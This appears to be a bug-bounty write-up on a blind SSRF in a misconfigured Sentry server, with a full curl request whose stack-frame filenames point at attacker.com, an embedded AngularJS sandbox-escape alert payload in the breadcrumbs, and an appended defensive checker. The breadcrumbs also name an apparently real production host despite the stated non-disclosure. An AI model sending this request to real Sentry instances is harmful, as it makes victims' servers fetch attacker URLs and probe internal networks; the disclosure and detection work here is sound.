Blind SSRF - Sentry Misconfiguration

Jerry Shah (Jerry)
Mar 17, 2020


Summary :

Blind SSRF vulnerabilities arise when an application can be induced to issue a back-end HTTP request to a supplied URL, but the response from the back-end request is not returned in the application’s front-end response.

The impact of blind SSRF vulnerabilities is often lower than that of fully informed SSRF vulnerabilities because of their one-way nature. They cannot be trivially exploited to retrieve sensitive data from back-end systems, although in some situations they can be exploited to achieve full remote code execution. The most reliable way to detect blind SSRF vulnerabilities is to use out-of-band (OAST) techniques. You can also find blind SSRF using Burp Collaborator.

I found this vulnerability on a responsible disclosure program. I won’t be able to disclose the name as the issue is not resolved yet. The vulnerability was due to a Sentry misconfiguration: source code scraping was not turned off. When it is turned on, the server that hosts Sentry will make blind GET requests to any URL an outside party places in an error report.

What is source code scraping ?

It means fetching a web resource by URL and parsing its content into the software you are using, so that the data can be handled like any other input. In Sentry’s case, the server fetches the script files named in the stack trace of a reported error.

More info : https://forum.sentry.io/t/source-code-scrapping/4167

How to find this vulnerability ?

  1. Go to the target website that uses Sentry.
  2. Spider that website using Burp Suite and you’ll find an endpoint that uses Sentry, like: /api/14/store/?sentry_version=7&sentry_client=raven-js%2F3.27.0&sentry_key=<key>
  3. This endpoint takes a JSON event body whose stack-trace frames carry a “filename” field. That field is vulnerable to blind SSRF: the Sentry server will make a blind GET request to whatever URL you put there, which your own listener will receive.

How to reproduce :

# curl derives Content-Length from the body it reads on stdin.
curl -i -s -k -X POST \
  -H 'Host: target.com' \
  -H 'Connection: close' \
  -H 'Origin: https://target.com' \
  -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36' \
  -H 'Content-Type: application/csp-report' \
  -H 'Accept: */*' \
  -H 'Accept-Encoding: gzip, deflate' \
  -H 'Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' \
  --data-binary @- \
  'https://target.com/api/30/store/?sentry_version=7&sentry_client=raven-js%2F3.25.2&sentry_key=<key>' <<'EOF'
{"project":"30","logger":"javascript","platform":"javascript",
 "request":{"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36","Referer":"https://attacker.com/Business/Contractors/ContractorInfo?sessionid=40030075&id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c"},"url":"https://attacker.com/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075"},
 "exception":{"values":[{"type":"Error","value":"Trying to get control scope but angular isn't ready yet or something like this","stacktrace":{"frames":[
   {"filename":"https://attacker.com/dist/vendor.bundle.eec570ee672e4b47c7a2.js","lineno":110,"colno":81071,"function":"XMLHttpRequest.o","in_app":true},
   {"filename":"https://attacker.com/dist/vendor.bundle.eec570ee672e4b47c7a2.js","lineno":96,"colno":75069,"function":"XMLHttpRequest.<anonymous>","in_app":true},
   {"filename":"https://attacker.com/dist/vendor.bundle.eec570ee672e4b47c7a2.js","lineno":96,"colno":71510,"function":"k","in_app":true},
   {"filename":"https://attacker.com/dist/vendor.bundle.eec570ee672e4b47c7a2.js","lineno":96,"colno":23681,"function":"Object.fireWith [as resolveWith]","in_app":true},
   {"filename":"https://attacker.com/dist/vendor.bundle.eec570ee672e4b47c7a2.js","lineno":96,"colno":22924,"function":"s","in_app":true},
   {"filename":"https://attacker.com/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js","lineno":1,"colno":724721,"function":"Object.n.(anonymous function) [as success]","in_app":true},
   {"filename":"https://attacker.com/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js","lineno":1,"colno":725795,"function":"Object.n.success","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":757703,"function":"Object.executeInContext","in_app":true},
   {"filename":"https://attacker.com/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js","lineno":1,"colno":725917,"function":"?","in_app":true},
   {"filename":"https://attacker.com/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js","lineno":1,"colno":723970,"function":"c.json.c.toLowerCase.n.success.n.success","in_app":true},
   {"filename":"https://attacker.com/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075","lineno":2446,"colno":299,"function":"ajaxOptions.success","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":313620,"function":"NotificationCenter.<anonymous>","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":316137,"function":"NotificationCenterDropdown.setValue","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":542056,"function":"NotificationCenterDropdown.setValue","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":665829,"function":"NotificationCenterDropdown.setValue","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":666057,"function":"NotificationCenterDropdown._scatter","in_app":true},
   {"filename":"<anonymous>","lineno":null,"colno":null,"function":"Array.forEach","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":666079,"function":"?","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":714602,"function":"ListClientBinding.output","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":713050,"function":"ListClientBinding.output","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":448313,"function":"NotificationCenterOuterList.setValue","in_app":true},
   {"filename":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","lineno":1,"colno":683081,"function":"NotificationCenterOuterList.getScope","in_app":true}
 ]}}]},
 "transaction":"https://attacker.com/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js","trimHeadFrames":0,
 "tags":{"AbonentId":"<id>","UserId":"<id>","OrganizationId":"<id>"},
 "extra":{"session:duration":357},
 "breadcrumbs":{"values":[
   {"timestamp":1530367897.368,"category":"sentry","message":"$parse:lexerr: Lexer Error: Unterminated quote at columns 47-67 ['x=1} } };alert(1));] in expression ['a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1));].","event_id":"57575ae92ea2477d8ba3665017601f81","level":"error"},
   {"timestamp":1530367897.373,"message":"Error: [$parse:lexerr] Lexer Error: Unterminated quote at columns 47-67 ['x=1} } };alert(1));] in expression ['a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1));].\nhttp://errors.angularjs.org/1.5.8/$parse/lexerr?p0=Unterminated%20quote&p1=s%2047-67%20%5B'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B%5D&p2='a'.constructor.prototype.charAt%3D%5B%5D.join%3B%24eval('x%3D1%7D%20%7D%20%7D%3Balert(1))%3B\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:365\n at hr.throwError (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:75995)\n at hr.readString (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:77352)\n at hr.lex (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:74150)\n at vr.ast (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:80676)\n at Er.compile (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:85908)\n at Or.parse (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:100573)\n at c (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:101408)\n at p (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:63437)\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42036\n at oe (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42291)\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40233)\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\n at ee (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:39604)\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9411\n at c.$eval (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111066)\n at c.$apply (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111299)\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9371\n at Object.invoke (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:24205)\n at o (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9292)\n at Object.xe [as bootstrap] (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9579)\n at Object.bootstrap (https://elba.kontur.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js:1:633795)\n at Function.run (https://elba.kontur.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js:1:38538)\n at https://elba.kontur.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075:3511:21 undefined","level":"error","category":"console"},
   {"timestamp":1530367897.415,"category":"sentry","message":"Error: Trying to get control scope but angular isn't ready yet or something like this","event_id":"<id>","level":"error"},
   {"timestamp":1530367897.455,"category":"ui.click","message":"input#ContractorRequisitesEdit_ContractorShortName_Input.c-input.c-input_elastic[type=\"text\"]"},
   {"timestamp":1530367897.54,"type":"http","category":"xhr","data":{"method":"POST","url":"https://elba.kontur.ru/Support/PortalAuth/SetPortalAuthCookie?id=<id>&sessionid=40030075","status_code":200}},
   {"timestamp":1530367897.577,"type":"http","category":"xhr","data":{"method":"GET","url":"https://elba.kontur.ru/Notices/NotificationCenter/GetViewData?id=<id>&sessionid=40030075&_=1530367897217","status_code":200}}
 ]},
 "user":{"id":"<id>"},
 "release":"mobile_analitcs_redirect_fix e1293c0084a3",
 "event_id":"<id>"}
EOF
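As an added example (not part of the original post), here is the defender-side counterpart to the request above: a check that walks the exception.values[].stacktrace.frames[].filename fields of a store body and returns every URL that points outside the application’s own hosts, which is exactly what a Sentry server with source scraping left on would fetch. The allow-list, the function names and the sample event (hosts attacker.example and 127.0.0.1) are assumptions constructed for the example.

```python
"""Flag Sentry store events whose stack frames point at foreign hosts."""
import ipaddress
import json
from urllib.parse import urlsplit

# Assumption for this example: the only hosts the application serves scripts from.
ALLOWED_HOSTS = {"target.com", "cdn.target.com"}


def is_private_host(host: str) -> bool:
    """True for loopback, link-local and RFC 1918 IP literals, or 'localhost'."""
    try:
        return not ipaddress.ip_address(host).is_global
    except ValueError:           # not an IP literal
        return host == "localhost"


def suspicious_frame_urls(event: dict, allowed_hosts=ALLOWED_HOSTS) -> list:
    """Return frame filenames Sentry would fetch from a host outside the allow-list."""
    hits = []
    for value in event.get("exception", {}).get("values", []):
        for frame in value.get("stacktrace", {}).get("frames", []):
            name = frame.get("filename") or ""
            parts = urlsplit(name)
            if parts.scheme not in ("http", "https"):
                continue         # "<anonymous>" and relative paths are not fetched remotely
            host = (parts.hostname or "").lower()
            if host not in allowed_hosts or is_private_host(host):
                hits.append(name)
    return hits


# Constructed sample event, shaped like the raven-js payload above (hosts are placeholders).
SAMPLE_EVENT = json.loads("""{
  "project": "30", "platform": "javascript",
  "exception": {"values": [{"type": "Error", "value": "boom",
    "stacktrace": {"frames": [
      {"filename": "https://target.com/dist/app.js", "lineno": 1, "colno": 10},
      {"filename": "https://attacker.example/dist/vendor.js", "lineno": 96, "colno": 1},
      {"filename": "http://127.0.0.1:8080/internal.js", "lineno": 1, "colno": 1},
      {"filename": "<anonymous>", "lineno": null, "colno": null}
    ]}}]}
}""")

if __name__ == "__main__":
    for url in suspicious_frame_urls(SAMPLE_EVENT):
        print("frame source on a non-allowed host:", url)
```

Running it as an ingest-side filter or over stored event bodies surfaces the pattern before the server fetches anything; turning source scraping off remains the actual fix.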

Callbacks :

[Screenshot: the blind GET request from the Sentry server arriving at the listener]

Thank You :)

Instagram : jerry._.3
